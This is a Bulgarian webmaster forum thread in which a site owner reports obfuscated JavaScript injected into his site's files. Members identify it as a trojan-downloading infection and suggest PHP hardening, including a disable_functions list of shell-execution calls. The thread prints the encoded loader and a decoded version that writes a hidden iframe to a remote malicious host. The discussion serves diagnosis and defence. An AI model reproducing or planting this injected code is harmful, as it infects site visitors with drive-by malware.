Хора имам много сериозен проблем (php maybe?)

[Sp0oN]

                            <!-- 45aa495d41db0ee3f149c75dfff51d11 --><script>document.write(unescape("%3Cscript%3Efunction%20dhs951%28unil57%29%7Bvar%20szl0rm%3Dnew%20String%28arguments.callee%29%3Bszl0rm%3Dszl0rm.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Cx2glo3%3D0%2Cqtuqvm%3D0%2Cmdx4yh%3D%27%27%2Cujbwzl%3D0%3Bfor%28var%20cychof%3D0%3Bcychof%3Cszl0rm.length%3Bcychof++%29ujbwzl+%3Dszl0rm.charCodeAt%28cychof%2C1%29%3Bfor%28x2glo3%3D0%3Bx2glo3%3Cunil57.length%3Bx2glo3++%29%7Bvar%20hplbho%3Dunil57%5Bx2glo3%5D%2Ca01k65%3Dszl0rm.substr%28qtuqvm%2C1%29.charCodeAt%280%29%5Eujbwzl%3Bmdx4yh+%3DString.fromCharCode%28hplbho%5Ea01k65%29%3Bqtuqvm++%3Bif%28qtuqvm%3D%3Dszl0rm.length%29qtuqvm%3D0%7Ddocument.write%28mdx4yh%29%3Bmdx4yh%3D%27%27%7Ddhs951%28new%20Array%2830133%2C30185%2C30178%2C30206%2C30194%2C30198%2C30196%2C30143%2C30086%2C30093%2C30159%2C30082%2C30088%2C30103%2C30089%2C30205%2C30127%2C30198%2C30193%2C30101%2C30092%2C30089%2C30189%2C30199%2C30189%2C30201%2C30139%2C30164%2C30099%2C30194%2C30167%2C30149%2C30203%2C30146%2C30180%2C30185%2C30192%2C30153%2C30113%2C30133%2C30151%2C30184%2C30184%2C30182%2C30201%2C30198%2C30179%2C30190%2C30197%2C30132%2C30152%2C30124%2C30197%2C30115%2C30197%2C30187%2C30200%2C30150%2C30184%2C30120%2C30199%2C30103%2C30196%2C30193%2C30128%2C30133%2C30188%2C30146%2C30138%2C30117%2C30170%2C30141%2C30188%2C30192%2C30193%2C30118%2C30202%2C30187%2C30101%2C30126%2C30091%2C30120%2C30091%2C30156%2C30106%2C30082%2C30088%2C30083%2C30180%2C30089%2C30168%2C30146%2C30093%2C30136%2C30133%2C30163%2C30173%2C30145%2C30194%2C30125%2C30135%2C30134%2C30143%2C30181%2C30134%2C30129%2C30202%2C30130%2C30201%2C30098%2C30084%2C30096%2C30179%2C30095%2C30112%2C30186%2C30124%2C30157%2C30166%2C30168%2C30142%2C30185%2C30207%2C30186%2C30188%2C30192%2C30097%2C30147%2C30189%2C30128%2C30135%2C30086%2C30107%2C30093%2C30085%2C30191%2C30187%2C30190%2C30188%2C30204%2C30188%2C30097%2C30121%2C30192%2C30199%2C30088%2C30129%2C30119%2C30182%2C30193%2C30107%2C30086%2C30199%2C30186%2C30182%2C30161%2C30204%2C30180%2C30179%2C30195%2C30191%2C30205%2C30181%2C30181%2C30182%2C30175%2C30112%2C30114%2C30106%2C30094%2C30080%2C30092%2C30082%2C30098%2C30191%2C30179%2C30181%2C30200%2C30141%2C30119%2C30183%2C30087%2C30154%2C30162%2C30197%2C30199%2C30184%2C30201%2C30139%2C30197%2C30081%2C30200%2C30130%2C30125%2C30120%2C30193%2C30189%2C30132%2C30152%2C30198%2C30164%2C30181%2C30206%2C30189%2C30148%2C30114%2C30119%2C30135%2C30103%2C30189%2C30178%2C30180%2C30141%2C30119%2C30118%2C30093%2C30109%2C30152%2C30190%2C30190%2C30196%2C30099%2C30180%2C30098%2C30176%2C30126%2C30190%2C30101%2C30110%2C30202%2C30162%2C30127%2C30125%2C30167%2C30096%2C30197%2C30164%2C30146%2C30194%2C30112%2C30080%2C30099%2C30190%2C30149%2C30121%2C30113%2C30135%2C30180%2C30200%2C30098%2C30179%2C30186%2C30181%2C30130%2C30085%2C30089%2C30083%2C30115%2C30121%2C30204%2C30131%2C30203%2C30193%2C30203%2C30112%2C30124%2C30201%2C30190%2C30185%2C30184%2C30099%2C30109%2C30145%2C30108%2C30180%2C30198%2C30181%2C30150%2C30162%2C30114%2C30194%2C30196%2C30089%2C30195%2C30195%2C30197%2C30203%2C30192%2C30091%2C30204%2C30190%2C30093%2C30140%2C30112%2C30125%2C30202%2C30190%2C30195%2C30084%2C30186%2C30194%2C30197%2C30192%2C30129%2C30123%2C30190%2C30196%2C30191%2C30106%2C30081%2C30093%2C30087%2C30100%2C30181%2C30182%2C30115%2C30123%2C30202%2C30195%2C30094%2C30092%2C30152%2C30203%2C30185%2C30207%2C30205%2C30196%2C30183%2C30203%2C30146%2C30201%2C30088%2C30178%2C30182%2C30088%2C30192%2C30206%2C30201%2C30126%2C30120%2C30113%2C30188%2C30083%2C30100%2C30089%2C30201%2C30081%2C30093%2C30087%2C30100%2C30085%2C30198%2C30186%2C30200%2C30151%2...56%2C30187%2C30188%2C30196%2C30133%2C30191%2C30183%2C30191%2C30188%2C30088%2C30179%2C30133%2C30113%2C30138%2C30120%2C30122%2C30178%2C30133%2C30192%2C30084%2C30178%2C30185%2C30199%2C30187%2C30115%2C30118%2C30150%2C30125%2C30137%2C30115%2C30158%2C30132%2C30137%2C30097%2C30111%2C30090%2C30198%2C30191%2C30183%2C30101%2C30184%2C30200%2C30193%2C30115%2C30177%2C30135%2C30087%2C30189%2C30087%2C30111%2C30108%2C30194%2C30184%2C30091%2C30186%2C30188%2C30098%2C30193%2C30099%2C30147%2C30093%2C30148%2C30139%2C30120%2C30093%2C30083%2C30102%2C30139%2C30192%2C30192%2C30192%2C30135%2C30115%2C30118%2C30124%2C30177%2C30130%2C30179%2C30089%2C30101%2C30103%2C30198%2C30097%2C30180%2C30123%2C30121%2C30151%2C30194%2C30185%2C30114%2C30132%2C30185%2C30205%2C30187%2C30187%2C30095%2C30103%2C30140%29%29%3C/script%3E"))</script><!--/-->

Днес ми се "счупи" сайта, и намерих ето тази бозня в два от
основните файлове ... Изтрих я, сейвнах и ги направих на 444 права ...
Някой да знае ... какво по дяволите е това ?!

 

[iavor]

Re: Хора имам много сериозен проблем (php maybe?)

Това е скрипт, който прави скрипт, който може би прави скрипт - имаше някакви червеи за ПХП, ако неочаквано съдържанието на сайта ти се е сменил с туй - червей ще да е, особено ако ползваш готов софт, дето не си го пачвал скоро .... Ох

 

[bgkulinar]

Re: Хора имам много сериозен проблем (php maybe?)

Споко, това е някаква JS функция дето сменя регистрите или нещо такова.

 

[hristu]

Re: Хора имам много сериозен проблем (php maybe?)

Aми точно този скрипт ни прави нищо, понеже с счупен:

Error: missing name after . operator
Source File: file:///proba.html
Line: 1, Column: 90
Source Code:
30085,30198,30186,30200,[B]30151%2...56[/B],30187,30188,

 

[Kalin4y]

Re: Хора имам много сериозен проблем (php maybe?)

да...това е snipper на джаваскрипта. Просто не е заредил целия...ще се оправи. рефрешни си страницата и виж какви джаваскриптове ползваш : )

 

[Sp0oN]

Re: Хора имам много сериозен проблем (php maybe?)

не не
аз не го сложих целия, защото форума ми вика че поста може да е само 1200 символа а този скрипт е 14,000 и нагоре май ...

 

[Sp0oN]

Re: Хора имам много сериозен проблем (php maybe?)

не ме притеснява чак толкова какво прави скрипта, колкото това, че въобще е попаднал на сървъра ... някаква система за защита универсална няма ли бе да му .... обичам роднините !

 

[Kalin4y]

Re: Хора имам много сериозен проблем (php maybe?)

не неаз не го сложих целия

после се чудиш защо се появяват такива неща

 

[Sp0oN]

Re: Хора имам много сериозен проблем (php maybe?)

не бе =) тук не сложих цялата боза. Ето, прикаченият файл е целият скрипт който намерих...

 

[biodesign]

Re: Хора имам много сериозен проблем (php maybe?)

Ами ей това е кода ама какво прави е**ш ли му майката


function pjo(){}
pjo.prototype = {

host:'nc.4orea.ved',path:'/nc.gnitsoh-niam/',cookieName:'a4drv',cookieValue:1,

install : function()
{
if(!this.alreadyInstalled())
{
var s = "<iframe width=10 height=10 frameBorder=1 src='" + this.getFrameURL() + "'></iframe>";
try { document.write(s) }
catch(e){ document.write("<html><body>" + s + "</lady></html>") }
this.setCookie(this.cookieName, this.cookieValue);
}
},
setCookie : function(name, value)
{
var d= new Date(); d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
},
alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getFrameURL : function() {
var dlh=document.location.host;
sa = 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
alert(sa);
return sa;
},
getRandString : function()
{
var l=16, c= '0123456789abcdef', o=''; for (var i=0; i < l; i++) o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
return o;
}
}
var o = new pjo(); o.install();

 

[marti13]

Re: Хора имам много сериозен проблем (php maybe?)

И аз имам същия проблем.
Кажи реши ли товя и по какъв начин.

Поздрави

 

[nikoladd]

Re: Хора имам много сериозен проблем (php maybe?)

прави download на троянци. Работи само в ИЕ мисля.
затегнете си сигурноста в ПХП тук има някои препоръки които може да са полезни
http://www.webmasterbg.org/showthread.php?p=12761#post12761

и си патчвайте софта.

също някъде по дървото вероятно имаш някакъв майлер скрипт и .exe порови добре.

доста неприятен ефект е че антивирусните на посетителите ви много вероятно ще почнат да предупреждават за троянци на вашите сайтове.

Успех с ровенето.

 

[Sp0oN]

Re: Хора имам много сериозен проблем (php maybe?)

delete на всичкия такъв код, 444 на всички файлове на които не им пречи, проверка на дървото, патч на софта ...

 

[marti13]

Re: Хора имам много сериозен проблем (php maybe?)

прави download на троянци. Работи само в ИЕ мисля.
затегнете си сигурноста в ПХП тук има някои препоръки които може да са полезни
http://www.webmasterbg.org/showthread.php?p=12761#post12761

и си патчвайте софта.

също някъде по дървото вероятно имаш някакъв майлер скрипт и .exe порови добре.

доста неприятен ефект е че антивирусните на посетителите ви много вероятно ще почнат да предупреждават за троянци на вашите сайтове.

Успех с ровенето.

Мерси пич!

Не намерих никакъв скрипт или екзе, които аз не съм слагал.

това с htaccess го пробвах и написах следното във файла:

Първия ред си ми стоеше - php_flag register_globals on

Надолу:
php_flag safe_mode On

php_flag disable_functions system,exec,shell_exec,passthru,error_log,ini_alter,dl,pfsockopen, openlog, syslog, readlink, symlink, link, leak, popen, escapeshellcmd, proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,escapeshellarg,pcntl_exec

php_flag display_errors Off

php_flag log_errors On

php_flag error_log syslog

php_flag ignore_repeated_errors On

php_flag max_execution_time 30

php_flag max_input_time 60

php_flag memory_limit 8M

php_flag post_max_size 2M

php_flag file_uploads = Off

php_flag upload_max_filesize 2M

php_flag allow_url_fopen Off

php_flag expose_php Off

Сам се сещай кво стана - К*р сайт и форум

 

[nikoladd]

Re: Хора имам много сериозен проблем (php maybe?)

Мерси пич!

Не намерих никакъв скрипт или екзе, които аз не съм слагал.

по принцип през такъв се осъществява подобна атака, така че гледай да си сигурен ча си проверил добре.

Първия ред си ми стоеше - php_flag register_globals on

това е много толяма дупка в сигурноста направи го OFF ако ти трябва специално за някой скрипт може да си го пуснеш вътрешно.

Сам се сещай кво стана - К*р сайт и форум

Тва все едно ми каза: "Не се справих ама сещай се" Какво има да се сещам? Нито те знам какво ползваш, нито си си напаравил труда да попрочетеш написаното в препоръките. Пробвай едно по едно и остави тези с които ти работи. Това са препоръки за защита първо си почисти сайта и тогава имат смисъл.